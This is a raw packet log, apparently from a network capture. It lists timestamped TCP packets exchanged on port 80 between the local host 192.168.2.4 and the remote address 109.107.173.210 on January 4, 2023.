Jan 4, 2023 16:47:26.415997982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.416006088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.416037083 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.416045904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.416074038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.416085958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.416104078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.416146040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439213037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439326048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439376116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439421892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439471960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439517975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439522982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439563990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439565897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439608097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439611912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439631939 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439662933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439666033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439711094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439717054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439759970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439805984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439815044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439853907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439901114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439905882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439946890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439951897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.439994097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.439999104 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440042019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440046072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440089941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440090895 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440150976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440152884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440198898 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440206051 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440244913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440289974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440336943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440361977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440382957 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440447092 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440494061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440516949 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440541029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440587997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440619946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440634966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440682888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440711975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440731049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440776110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440805912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440823078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440869093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440901041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.440916061 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440963984 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.440992117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.441025972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441071033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441076994 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.441119909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441198111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.441806078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441854954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441907883 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.441910982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.441975117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442004919 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442034006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442037106 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442100048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442122936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442154884 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442172050 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442223072 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442223072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442270994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442317963 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442349911 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442363977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442364931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442410946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442457914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442461967 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442506075 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442552090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442562103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442585945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442600012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442603111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442646980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442702055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442723036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442792892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442826033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442841053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442843914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442887068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442888021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442934036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.442935944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.442990065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443031073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443037033 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443053007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443080902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443084955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443128109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443140030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443182945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443192005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443236113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443238020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443281889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443286896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443331957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443336010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443380117 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443382025 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443428993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443475008 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443484068 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443496943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443521023 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443522930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443568945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443571091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443617105 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443619013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443665028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443666935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443708897 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443713903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443757057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443761110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443804026 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443808079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443855047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443856001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443902969 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443905115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.443949938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.443953991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444000959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444046974 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444093943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444142103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444188118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444188118 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444188118 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444224119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444237947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444237947 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444282055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444286108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444334030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444348097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444377899 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444380045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444427013 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444427013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444474936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444520950 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444566965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444612980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444658995 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444674015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444674015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444674015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444706917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444753885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444756031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444797039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444802046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444844961 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444849014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444894075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444896936 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444942951 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444964886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.444988966 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.444996119 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.445044041 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467077017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467111111 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467138052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467163086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467191935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467210054 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467236996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467262030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467300892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467333078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467333078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467361927 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467387915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467405081 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467415094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467439890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467442989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467467070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467479944 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467494965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467520952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467524052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467547894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467560053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467575073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467593908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467602015 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467628956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467629910 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467657089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467660904 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467684031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467688084 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467710972 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467715979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467736959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467741013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467756987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467763901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467786074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467792034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467812061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467818975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467838049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467845917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467866898 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467873096 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467900038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.467905998 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467928886 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.467948914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.470813990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470846891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470873117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470901012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470927000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470952988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470979929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.470999956 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471005917 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471035004 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471060038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471065044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471087933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471103907 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471113920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471148968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471158028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471199989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471227884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471240044 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471254110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471260071 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471281052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471283913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471304893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471308947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471332073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471338034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471369982 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471370935 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471414089 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471421957 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471438885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471447945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471463919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471473932 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471487999 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471497059 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471512079 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471514940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471537113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471537113 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471559048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471560955 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471585035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471586943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471610069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471636057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471734047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471757889 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471785069 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471808910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471817970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471832991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471857071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471868992 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471880913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471894979 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471905947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471929073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471939087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471952915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471976042 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.471986055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.471998930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472012043 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472023010 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472047091 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472054958 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472071886 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472089052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472096920 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472121954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472129107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472146034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472162962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472168922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472183943 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472193956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472217083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472222090 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472240925 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472246885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472266912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472273111 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472290039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472299099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472315073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472318888 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472340107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472342014 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472362995 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472366095 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472379923 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472390890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472434044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.472440004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.472459078 CET	80	49695	109.107.173.210	192.168.2.4
